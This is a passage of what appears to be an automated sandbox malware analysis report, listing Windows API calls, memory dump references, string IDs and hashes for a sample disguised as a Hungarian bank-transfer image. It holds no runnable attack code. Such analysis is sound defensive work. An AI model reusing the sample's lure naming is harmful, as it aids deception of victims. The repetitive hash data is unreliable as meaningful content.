                                                                                                          • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                          • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                                                          APIs
                                                                                                          • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                                                          • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                                                          • GetDesktopWindow.USER32 ref: 0045476F
                                                                                                          • GetWindowRect.USER32(00000000), ref: 00454776
                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                                                          • GetClientRect.USER32(?,?), ref: 004547D2
                                                                                                          • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                                                          • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                          • String ID:
                                                                                                          • API String ID: 3869813825-0
                                                                                                          • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                          • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                                                          • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                          • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                                                          APIs
                                                                                                          • _wcslen.LIBCMT ref: 00464B28
                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                                                          • _wcslen.LIBCMT ref: 00464C28
                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                                                          • _wcslen.LIBCMT ref: 00464CBA
                                                                                                          • _wcslen.LIBCMT ref: 00464CD0
                                                                                                          • _wcslen.LIBCMT ref: 00464CEF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$Directory$CurrentSystem
                                                                                                          • String ID: D
                                                                                                          • API String ID: 1914653954-2746444292
                                                                                                          • Opcode ID: bb88b9e33802b8f959be53c6b132484157298b773cf762090a06ca1d35dd5c67
                                                                                                          • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                                                          • Opcode Fuzzy Hash: bb88b9e33802b8f959be53c6b132484157298b773cf762090a06ca1d35dd5c67
                                                                                                          • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wcsicoll
                                                                                                          • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                                                          • API String ID: 3832890014-4202584635
                                                                                                          • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                                          • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                                                          • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                                          • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                                                          APIs
                                                                                                          • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                                                          • GetFocus.USER32 ref: 0046A0DD
                                                                                                          • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePost$CtrlFocus
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 1534620443-4108050209
                                                                                                          • Opcode ID: 5424a9e8c615beb4ff65f855739771b25ef8df7c7451d22eb1c524710b74d8e0
                                                                                                          • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                                                          • Opcode Fuzzy Hash: 5424a9e8c615beb4ff65f855739771b25ef8df7c7451d22eb1c524710b74d8e0
                                                                                                          • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                                                          APIs
                                                                                                          • DestroyWindow.USER32(?), ref: 004558E3
                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CreateDestroy
                                                                                                          • String ID: ,$tooltips_class32
                                                                                                          • API String ID: 1109047481-3856767331
                                                                                                          • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                          • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                                                          • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                          • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                                                          APIs
                                                                                                          • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                                                          • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                                                          • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                                                          • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                                                          • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                                                          • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                                                          • GetMenuItemCount.USER32 ref: 00468CFD
                                                                                                          • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                                                          • GetCursorPos.USER32(?), ref: 00468D3F
                                                                                                          • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                                                          • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 1441871840-4108050209
                                                                                                          • Opcode ID: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                                                                                          • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                                                          • Opcode Fuzzy Hash: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                                                                                          • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                          • __swprintf.LIBCMT ref: 00460915
                                                                                                          • __swprintf.LIBCMT ref: 0046092D
                                                                                                          • _wprintf.LIBCMT ref: 004609E1
                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                          • API String ID: 3631882475-2268648507
                                                                                                          • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                          • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                                                          • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                          • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                                                          APIs
                                                                                                          • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                                                          • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                                                          • SendMessageW.USER32 ref: 00471740
                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                                                          • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                                                          • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                                                          • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                                                          • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                                                          • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                                                          • SendMessageW.USER32 ref: 0047184F
                                                                                                          • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                                                          • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                                                          • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                                                          • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                                                          • String ID:
                                                                                                          • API String ID: 4116747274-0
                                                                                                          • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                          • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                                                          • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                          • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                                                          APIs
                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                                                                          • _wcslen.LIBCMT ref: 00461683
                                                                                                          • __swprintf.LIBCMT ref: 00461721
                                                                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                                                                          • GetDlgCtrlID.USER32(?), ref: 00461869
                                                                                                          • GetWindowRect.USER32(?,?), ref: 004618A4
                                                                                                          • GetParent.USER32(?), ref: 004618C3
                                                                                                          • ScreenToClient.USER32(00000000), ref: 004618CA
                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                                                          • String ID: %s%u
                                                                                                          • API String ID: 1899580136-679674701
                                                                                                          • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                          • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                                                                          • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                          • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                                                                          APIs
                                                                                                          • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                                                          • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                                                          • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoItemMenu$Sleep
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 1196289194-4108050209
                                                                                                          • Opcode ID: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                                                                                          • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                                                                          • Opcode Fuzzy Hash: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                                                                                          • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                                                                          APIs
                                                                                                          • GetDC.USER32(00000000), ref: 0043143E
                                                                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                                                          • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                                          • String ID: (
                                                                                                          • API String ID: 3300687185-3887548279
                                                                                                          • Opcode ID: 41c92e605eac5f81c665823633bc68f417f49a489604f1da0c85237d78d6e876
                                                                                                          • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                                                          • Opcode Fuzzy Hash: 41c92e605eac5f81c665823633bc68f417f49a489604f1da0c85237d78d6e876
                                                                                                          • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                                                          APIs
                                                                                                            • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                            • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                          • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
